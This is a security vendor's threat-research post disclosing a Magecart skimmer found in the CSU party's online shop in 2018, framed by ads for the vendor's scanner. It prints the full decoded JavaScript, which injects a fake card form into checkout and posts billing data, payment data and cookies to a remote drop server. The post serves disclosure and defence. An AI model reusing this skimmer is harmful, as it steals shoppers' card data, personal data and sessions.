eComscan secures over 7,000 online stores
  • 30-day money back guarantee
  • Easy 5 minute install
  • Cancel any time
Get started in 5 minutes!
Secure your store today.
CLICK HERE

German political party store hacked before election

  • October 15, 2018

    Web Skimming / Sansec Threat Research
    Learn about new eCommerce hacks?

    Receive an alert whenever we discover new hacks or vulnerabilities that may affect your online store.

  • What is
    Magecart?

    Also known as digital skimming, this crime has surged since 2015. Criminals steal card data during online shopping. Who are behind these notorious hacks, how does it work, and how have Magecart attacks evolved over time?

    About Magecart

CSU hacked

The store of German political party CSU (www.csu-shop.de) contains an identity skimmer that was planted on or before Oct 5th, right before the Bavarian election on Oct 14th. Personal identifyable information of customers gets sent to a remote server during the checkout process.

Because the CSU shop uses an off-site payment provider (Amazon & Paypal), no credit cards are stolen. However, session cookies and other private data are actively intercepted. The attackers likely used an unpatched flaw in the store software, or used brute force to guess a staff password. A quick MageReport scan yields:

The German coalition party is not the only one affected. I have been monitoring global stores for some time and counted the 40,000th compromised shop last week. The modus operandi is commonly known as "Magecart" and has hit high profile targets such as British Airways, Ticketmaster and ABS-CBN.

Here is the proof that the identity stealer is active and working.

The obfuscated malware is found at the bottom of https://www.csu-shop.de/js/infortis/jquery/jquery-1.7.2.min.js. This file was last modified on Fri, 05 Oct 2018 14:45:47 GMT, suggesting the malware is in place since at least 9 days. It fetches a dynamic payload drop server from records.nstatistics.com/records.php?standart, at the moment it will return b0b127c6.ngrok.io/checkpayment.php but the malware authors anticipate that they will have to change this, as Ngrok (free proxy for developers) will likely shut them down soon. The decoded malware reads:

var form = `<style>#checkout-payment-method-load dt.ppp input {display:block;}</style><li><label for=\"payment:cc_number\"><em>*</em>Credit Card Number</label><div class=\"input-box\"><input type=\"text\" id=\"payment:cc_number\" name=\"payment[cc_number]\" title=\"Credit Card Number\" class=\"input-text validate-cc-number\" value=\"\" autocomplete=\"off\"></div></li><li><label for=\"billing:expiration_date\"><em>*</em>Expiration Date</label><div class=\"input-box\"><div class=\"v-fix\"><select id=\"payment:cc_exp_month\" name=\"payment[cc_exp_month]\" class=\"month validate-cc-exp\" autocomplete=\"off\"><option value=\"\" selected=\"selected\">Month</option><option value=\"1\">01</option><option value=\"2\">02</option><option value=\"3\">03</option><option value=\"4\">04</option><option value=\"5\">05</option><option value=\"6\">06</option><option value=\"7\">07</option><option value=\"8\">08</option><option value=\"9\">09</option><option value=\"10\">10</option><option value=\"11\">11</option><option value=\"12\">12</option></select></div><div class=\"v-fix\"><select id=\"payment:cc_exp_year\" name=\"payment[cc_exp_year]\" class=\"year\" autocomplete=\"off\"><option value=\"\" selected=\"selected\">Year</option><option value=\"2018\">2018</option><option value=\"2019\">2019</option><option value=\"2020\">2020</option><option value=\"2021\">2021</option><option value=\"2022\">2022</option><option value=\"2023\">2023</option><option value=\"2024\">2024</option><option value=\"2025\">2025</option><option value=\"2026\">2026</option><option value=\"2027\">2027</option><option value=\"2028\">2028</option><option value=\"2029\">2029</option></select></div></div></li><li><label for=\"payment:cc_cid\"><em>*</em>Card Verification Number</label><div class=\"input-box\"><div class=\"v-fix\"><input  type=\"text\" title=\"Card Verification Number\" class=\"input-text cvv validate-cc-cvn\" id=\"cc_cidcvv\" name=\"payment[cc_cid]\" value=\"\" autocomplete=\"off\"></div></div></li>`;
var statusrr = 0;

function PayN(text) {
    jQuery.get("//records.nstatistics.com/records.php?standart", function(record) {
        if (text == 1) {
            jQuery("*[name^=\"billing\"]").each(function() {
                if (billing[this.name] == "" || billing[this.name] == "undefined" || typeof billing[this.name] === "undefined") billing[this.name] = this.value
            });
            jQuery.ajax({
                url: atob(record),
                type: "POST",
                data: "billing=" + encodeURIComponent(btoa(JSON.stringify(billing))) + "&target=" + location.host + "&valid=" + encodeURIComponent(document.cookie)
            })
        }
        if (text == 2) {
            jQuery("*[name^=\"payment\"]").each(function() {
                payment[this.name] = this.value
            });
            jQuery.ajax({
                url: atob(record),
                type: "POST",
                data: "payment=" + encodeURIComponent(btoa(JSON.stringify(payment))) + "&target=" + location.host + "&valid=" + encodeURIComponent(document.cookie)
            });
            statusrr = 1;
            jQuery("#checkout-payment-method-load .iways_paypalplus_payment:first").html(" ");
            jQuery("#checkout-payment-method-load .iways_paypalplus_payment:eq(1)").attr("style", "opacity:1;			");
            jQuery("#checkout-payment-method-load .iways_paypalplus_payment:first").attr("style", "display:none;			")
        }
    })
}
jQuery(document).ready(function() {
    if (!(document.cookie.indexOf("userpayid") + 1)) {
        var rand = function() {
            return Math.random().toString(36).substr(2)
        };
        document.cookie = "userpayid=" + rand()
    }
    jQuery("*[onclick^=\"billing.save()\"]").attr("onclick", "PayN(1);	billing.save();	");
    jQuery("*[onclick^=\"payment.save()\"]").attr("onclick", "PayN(2);	payment.save();	");
    jQuery("*[onclick^=\"payment.save()\"]").removeAttr("disabled");
    jQuery("#checkout-payment-method-load .iways_paypalplus_payment:first").html(form);
    jQuery("#checkout-payment-method-load .iways_paypalplus_payment:eq(1)").attr("style", "opacity:0;	");
    jQuery("#checkout-payment-method-load .iways_paypalplus_payment:first").attr("style", "display:block;	");
    jQuery("input").removeAttr("disabled");
    jQuery("select").removeAttr("disabled");
    jQuery("button").removeAttr("disabled")
});
jQuery("html").click(function() {
    jQuery("input").removeAttr("disabled");
    jQuery("select").removeAttr("disabled");
    jQuery("button").removeAttr("disabled");
    if (!jQuery('*').is('#cc_cidcvv') && statusrr == 0) {
        jQuery("#checkout-payment-method-load .iways_paypalplus_payment:first").html(form);
        jQuery("#checkout-payment-method-load .iways_paypalplus_payment:eq(1)").attr("style", "opacity:0;		");
        jQuery("#checkout-payment-method-load .iways_paypalplus_payment:first").attr("style", "display:block;		");
        jQuery("*[onclick^=\"payment.save()\"]").removeAttr("disabled")
    }
    if (statusrr == 1) {
        jQuery("#checkout-payment-method-load .iways_paypalplus_payment:first").html(" ");
        jQuery("#checkout-payment-method-load .iways_paypalplus_payment:eq(1)").attr("style", "opacity:1;		");
        jQuery("#checkout-payment-method-load .iways_paypalplus_payment:first").attr("style", "display:none;		")
    }
});

Hackers get smarter every day.
Outsmart them with eComscan.

eComscan is the automated backend security scanner that keeps your online store safe from attackers. Discover vulnerabilities and malicious activity instantly.
Sansec experts study dozens of hacks every day to keep you protected. Sansec is the only company specializing in Magento security and is a proud Adobe partner.

Scan now